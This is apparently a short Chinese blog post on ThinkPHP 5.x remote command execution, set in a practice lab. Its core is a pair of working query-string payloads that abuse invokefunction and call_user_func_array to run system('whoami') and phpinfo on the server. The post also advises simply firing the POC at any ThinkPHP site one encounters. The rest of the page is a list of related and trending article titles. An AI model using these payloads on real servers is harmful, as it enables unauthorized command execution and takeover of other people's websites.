常见框架漏洞(Thinkphp)

isllxiao2025-03-25 9:25

Thinkphp5x远程命令执行及getshell

开启环境,访问靶场


可以用工具进行检测是否存在漏洞

存在漏洞可以直接用工具get shell

也可以手工操作

远程代码执行whoami
POC:
? s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1
\[\]=whoami

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0=phpinfo&vars 1\[\]=-1
Thinkphp被曝很多漏洞,截至目前位置3x -- 6x的各个版本都被爆有大量漏洞,遇到TP的
站,直接打poc就可以了

相关推荐
ylscode3 小时前
PureLogs 信息窃取恶意软件惊现高危变种:借道 MsBuild.exe 进程空心化实施无痕攻击
网络·安全·安全威胁分析
云安全助手4 小时前
2026年企业级Claude中转服务深度评测:安全、稳定与速度的终极答案
人工智能·安全·claude·ai大模型
ylscode6 小时前
Windows 内核惊现高危提权漏洞 CVE-2026-40369:沙箱隔离失效,SYSTEM 权限唾手可得
网络·安全·安全威胁分析
李子琪。7 小时前
网络空间安全深度实战:CSRF 漏洞原理剖析与基于 Token 的纵深防御体系构建(全栈实验报告)
前端·安全·csrf
黎阳之光9 小时前
数智透明·安全兜底|黎阳之光透明矿山,AI+数字孪生守护矿山生命线
人工智能·物联网·算法·安全·数字孪生
信息安全失业大专人员9 小时前
HTTP/HTTPS 协议精髓与 WAF(Web 应用防火墙)架构防线大底座
web安全·http·信息安全·https·企业信息安全
Xpower 1710 小时前
MCP 服务器暴露在公网:AI Agent 工具层正在变成新的安全边界
服务器·人工智能·安全
2601_9564563410 小时前
2026跨境多账号防封指南:四大指纹浏览器多维深度横测,哪款指纹浏览器适合推荐?
人工智能·安全
风落无尘10 小时前
第十一章《对齐与安全》 完整学习资料
python·安全·机器学习
JGDT_10 小时前
端侧优化与企业落地挑战:Token成本与安全边界
安全
热门推荐
01GitHub 镜像站点02DeepSeek V4 + Claude Code thinking mode 400 错误修复方案03Codex 接入 DeepSeek API 完整配置文档04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10API Key 登录 Codex 也能用插件了,还支持会话删除和导出